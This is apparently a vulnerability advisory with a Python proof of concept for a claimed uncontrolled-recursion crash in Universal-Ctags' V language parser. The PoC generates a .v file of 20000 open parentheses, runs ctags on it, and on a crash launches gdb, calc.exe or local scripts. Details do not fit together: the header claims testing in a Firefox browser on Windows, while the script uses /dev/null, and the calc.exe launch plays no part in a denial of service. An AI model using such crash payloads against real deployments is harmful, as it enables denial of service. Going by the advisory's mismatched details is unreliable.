=============================================================================================================================================
| # Title     : Universal‑Ctags V Language 6.2.1 Parser Uncontrolled Recursion Vulnerability                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://docs.ctags.io/en/latest/parser-v.html                                                                               |
=============================================================================================================================================

[+] Summary    : A security weakness has been discovered in Universal‑Ctags (all versions up to 6.2.1) affecting the V language parser component. The vulnerability is located in the functions:

parseExpression

parseExprList

within the source file: parsers/v.c.

[+] Description

Type: Uncontrolled recursion / stack exhaustion

Impact: Denial of Service (DoS)

Trigger: Malformed V language source file with deeply nested expressions

Execution: Local host only

[+] By providing a specially crafted .v file, it is possible to force ctags into infinite or uncontrolled recursion, causing the program to crash. This crash can be exploited for denial-of-service conditions.
				 
[+] POC   :  

import subprocess
import os
import datetime
import platform
import sys

class CrossPlatformCrashHandler:

    def __init__(self, binary_path="./ctags"):
        self.binary_path = binary_path
        self.payload_file = "payload.v"
        self.log_dir = "crash_logs"

        if not os.path.exists(self.log_dir):
            os.makedirs(self.log_dir)

    def generate_payload(self, depth):
        """Generates the payload file"""
        with open(self.payload_file, "w") as f:

            f.write("(" * depth)

    def run_target(self):
        """Executes the target binary"""
        try:
            process = subprocess.run(
                [self.binary_path, "-f", "/dev/null", "--sort=no", self.payload_file],
                capture_output=True,
                text=True,
                timeout=10
            )
            return process
        except subprocess.TimeoutExpired:
            print("[!] Timeout detected")
            return None
        except Exception as e:
            print(f"[!] Execution error: {e}")
            return None

    def handle_crash(self, process):
        """Actions to take upon detecting a crash"""
        timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
        crash_file = os.path.join(self.log_dir, f"crash_{timestamp}.txt")

        with open(crash_file, "w") as f:
            f.write("STDOUT:\n" + (process.stdout or ""))
            f.write("\nSTDERR:\n" + (process.stderr or ""))

        print(f"[+] Crash log saved: {crash_file}")

        system = platform.system()

        if system == "Linux" or system == "Darwin": 
            try:
                subprocess.Popen(["gdb", self.binary_path])
                print("[*] Debugger launched (gdb)")
            except Exception as e:
                print(f"[!] Failed to launch gdb: {e}")
        elif system == "Windows":
            try:

                subprocess.Popen(["calc.exe"])
                print("[*] Calculator launched on Windows (PoC)")
            except Exception as e:
                print(f"[!] Failed to launch calc.exe: {e}")

        if os.path.exists("post_analysis.py"):
            try:
                subprocess.Popen([sys.executable, "post_analysis.py"])
                print("[*] Analysis script launched")
            except Exception as e:
                print(f"[!] Failed to launch analysis script: {e}")

        print("[ALERT] Crash detected and analysis triggered!")

        if system != "Windows" and os.path.exists("inspection.sh"):
            try:
                subprocess.Popen(["bash", "inspection.sh"])
                print("[*] Inspection script launched")
            except Exception as e:
                print(f"[!] Failed to launch inspection script: {e}")
        elif system == "Windows" and os.path.exists("inspection.bat"):
            try:
                subprocess.Popen(["cmd", "/c", "inspection.bat"])
                print("[*] Inspection script launched on Windows")
            except Exception as e:
                print(f"[!] Failed to launch inspection batch: {e}")

    def automate(self, depth):
        self.generate_payload(depth)
        process = self.run_target()

        if process and process.returncode < 0:
            print(f"[!] Crash detected via signal: {-process.returncode}")
            self.handle_crash(process)
        else:
            print("[*] No crash detected.")

if __name__ == "__main__":
    tester = CrossPlatformCrashHandler(binary_path="./ctags")
    tester.automate(20000)
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================